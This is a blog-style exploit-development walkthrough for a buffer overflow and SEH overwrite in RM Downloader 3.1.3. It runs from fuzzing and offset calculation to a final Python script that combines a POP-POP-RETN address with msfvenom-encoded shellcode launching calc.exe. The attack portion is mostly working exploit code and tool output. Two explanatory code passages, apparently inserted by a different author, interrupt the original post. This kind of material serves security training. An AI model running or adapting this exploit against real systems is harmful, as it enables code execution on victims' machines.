Kev

RM Downloader 3.1.3 - 'Load' Structured Exception Handling Overwrite


Preamble

The other day, I was going through Exploit-DB as usual, when I came across this exploit. Interested, I was eager to know if I could find a vulnerability. As a result of my success, I will explain the finding.

 

The Bug

RM Downloader suffers from a buffer overflow and a Structured Exception Handling (SEH) overwrite when long strings are entered in the ‘Load’ parameter.

 

A small fuzzing script is generated:

# Writes 10000 'A' bytes to poc.txt; bytes literals and binary mode so the
# script behaves the same under Python 2 and Python 3.
buffer = b"A" * 10000
with open("poc.txt", "wb") as f:
    f.write(buffer)

Once the script is executed, the file is created:

1.png

 

In order to crash the application with the generated bytes, open the ‘Load’ tab, and paste the contents within the ‘Load’ parameter:

2.png

3.png

 

Once this is done, click OK. Two additional message boxes may appear; just click OK.

4.png

 

After this is done, the application crashes:

5.png

 

Voila! EIP has been overwritten. Moreover, the SEH chain has been overwritten as well:

6.png

 

This application could easily be exploited with the use of a JMP/CALL ESP or PUSH ESP, RET. However, as I like SEH overwrites more, I will perform one in this case.

 

A pattern is generated and saved into a file named “pattern”:

root@whitecr0wz:~/Exploit-Dev# msf-pattern_create -l 10000 > pattern 
root@whitecr0wz:~/Exploit-Dev# 

The contents of the file “pattern” are copied and pasted into the ‘Load’ parameter, repeating the process:

7.png

 

After the SEH Chain values have been overwritten, the nSEH value is copied:

8.png

 

The offset is calculated with msf-pattern_offset:

root@whitecr0wz:~/Exploit-Dev# msf-pattern_offset -q 336F4C32 -l 10000 
[*] Exact match at offset 9008
root@whitecr0wz:~/Exploit-Dev# 
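To show where the 9008 reported by msf-pattern_offset comes from, here is an added Python example (my code, not the author's script and not Metasploit's own implementation) that builds the same upper/lower/digit pattern as msf-pattern_create and searches it for the DWORD read from the debugger. The value 336F4C32 is the one from the crash above; the function names are my own.

```python
import struct
from string import ascii_uppercase, ascii_lowercase, digits


def cyclic_pattern(length):
    """Metasploit-style pattern (same character sets as msf-pattern_create):
    every 3-byte group is upper+lower+digit, so no 4-byte window repeats
    within the first 26*26*10*3 = 20280 bytes."""
    chunks = []
    for u in ascii_uppercase:
        for l in ascii_lowercase:
            for d in digits:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(dword, length=10000):
    """Offset of the 4 pattern bytes that ended up in a register or SEH record.
    'dword' is the value as the debugger prints it (0x336F4C32 or "336F4C32");
    x86 is little-endian, so the bytes in the file appear in reverse order."""
    if isinstance(dword, str):
        dword = int(dword, 16)
    needle = struct.pack("<I", dword).decode("latin-1")
    return cyclic_pattern(length).find(needle)   # -1 if the value is not from the pattern


if __name__ == "__main__":
    # constructed check against the nSEH value from the crash above
    print(pattern_offset("336F4C32"))  # 9008
```

The debugger shows 336F4C32, but the bytes in memory are 32 4C 6F 33, i.e. the text "2Lo3"; the digit '2' closes the triple "Lo2" at index 3002, so the byte offset is 3002 * 3 + 2 = 9008, matching the tool's answer.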

The PoC is updated:

# 9008 bytes of padding, then 4 bytes that should land in nSEH and 4 in SEH.
buffer = b"A" * 9008 + b"BBBB" + b"CCCC"
with open("poc.txt", "wb") as f:
    f.write(buffer)

If the script works as intended, the nSEH value should be 42424242 (BBBB) and the SEH value 43434343 (CCCC):

9.png

 

Good, in a scenario like this, a 3-byte SEH overwrite could be performed in case there are no available addresses without a NULL-byte.

The modules are listed:

10.png

 

As seen, the module RDfilter03 does not have any kind of protections/mitigations. Moreover, the base address does not contain a NULL-byte.
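The module listing above is a report of what each module was linked with. As an added example (my code, not the author's and not the mona/Metasploit code that produced the screenshot), the following Python reads those flags straight from a PE header: ASLR (DYNAMIC_BASE), DEP (NX_COMPAT), NO_SEH and CFG from DllCharacteristics, plus the preferred image base. SafeSEH itself is recorded in the Load Config directory (SEHandlerTable) and is not parsed here. The header blob is constructed inline for the demonstration; it is not RDfilter03.

```python
import struct

# DllCharacteristics bits from the PE/COFF specification
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR opt-in (/DYNAMICBASE)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT    = 0x0100   # DEP opt-in (/NXCOMPAT)
IMAGE_DLLCHARACTERISTICS_NO_SEH       = 0x0400   # image never uses SEH
IMAGE_DLLCHARACTERISTICS_GUARD_CF     = 0x4000   # Control Flow Guard


def module_mitigations(image):
    """Report the mitigation flags a PE module was linked with.
    'image' is the raw file (or at least its headers) as bytes."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20          # IMAGE_FILE_HEADER is 20 bytes; the optional header follows
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic == 0x10B:               # PE32: ImageBase is a DWORD at +28
        image_base = struct.unpack_from("<I", image, opt + 28)[0]
    elif magic == 0x20B:             # PE32+: ImageBase is a QWORD at +24
        image_base = struct.unpack_from("<Q", image, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at +70 in both the PE32 and the PE32+ optional header
    dll_chars = struct.unpack_from("<H", image, opt + 70)[0]
    return {
        "image_base": image_base,
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "dep": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NO_SEH),
        "cfg": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_GUARD_CF),
        # a 32-bit module whose top address byte is 0x00 has a NULL byte in every address
        "every_address_has_null": (magic == 0x10B and (image_base >> 24) == 0),
    }


def build_pe32_header(image_base, dll_chars):
    """Constructed, minimal PE32 header with no sections, for demonstration only."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)     # e_lfanew: NT headers start right after the DOS header
    # Machine=i386, 0 sections, SizeOfOptionalHeader=224, Characteristics=EXECUTABLE|32BIT|DLL
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)     # PE32 magic
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)


if __name__ == "__main__":
    # constructed headers: one module linked without mitigations, one with ASLR and DEP
    for chars in (0x0000, 0x0140):
        print(module_mitigations(build_pe32_header(0x10000000, chars)))
```

A module that reports False for every flag is the weak link in the process: its handlers are not validated by SafeSEH and its addresses are fixed, which is exactly what the next step relies on. The fix on the vendor side is to relink such modules with /DYNAMICBASE, /NXCOMPAT and /SAFESEH; on the deployment side, enforcing DEP and SEHOP process-wide removes the dependence on each module's own flags.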

Listing the POP-POP-RETN sequences:

11.png

 

The first address (0x10031779) was chosen.

The PoC is updated:

import struct

# nSEH and SEH handler values, packed little-endian as the CPU reads them
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10031779)   # POP-POP-RETN in RDfilter03

buffer = b"A" * 9008 + nseh + seh + b"\xff" * 200
with open("poc.txt", "wb") as f:
    f.write(buffer)

After repeating the process, the SEH Chain values are overwritten as expected:

12.png

 

After pressing SHIFT+F9 (Run), the additional bytes are executed:

13.png

 

 

Shellcode is generated:

root@whitecr0wz:~/Exploit-Dev# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 448 (iteration=0)
x86/alpha_mixed chosen with final size 448
Payload size: 448 bytes
Final size of py file: 2188 bytes
buf =  b""
buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b"
buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75"
buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c"
buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b"
buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70"
buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72"
buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59"
buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32"
buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56"
buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71"
buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31"
buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64"
buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39"
buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70"
buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73"
buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78"
buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52"
buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b"
buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45"
buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a"
buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c"
buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71"
buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50"
buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f"
buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43"
buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45"
buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d"
buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42"
buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63"
buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68"
buf += b"\x53\x55\x35\x50\x41\x41"

 

EndGame

14.png

 

Final Code:

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 448 bytes

buf =  b""
buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b"
buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75"
buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c"
buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b"
buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70"
buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72"
buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59"
buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32"
buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56"
buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71"
buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31"
buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64"
buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39"
buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70"
buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73"
buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78"
buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52"
buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b"
buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45"
buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a"
buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c"
buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71"
buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50"
buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f"
buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43"
buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45"
buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d"
buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42"
buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63"
buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68"
buf += b"\x53\x55\x35\x50\x41\x41"

# nSEH and SEH handler values, packed little-endian as the CPU reads them
nseh = struct.pack("<I", 0x06710870)
seh = struct.pack("<I", 0x10031779)   # POP-POP-RETN in RDfilter03

# 9008 bytes of padding, the SEH record, 10 bytes of padding, the payload, then filler
buffer = b"A" * 9008 + nseh + seh + b"\x41\x49" * 5 + buf + b"\xff" * 200
with open("poc.txt", "wb") as f:
    f.write(buffer)

 

Source: hwhitecr0wz.github.io
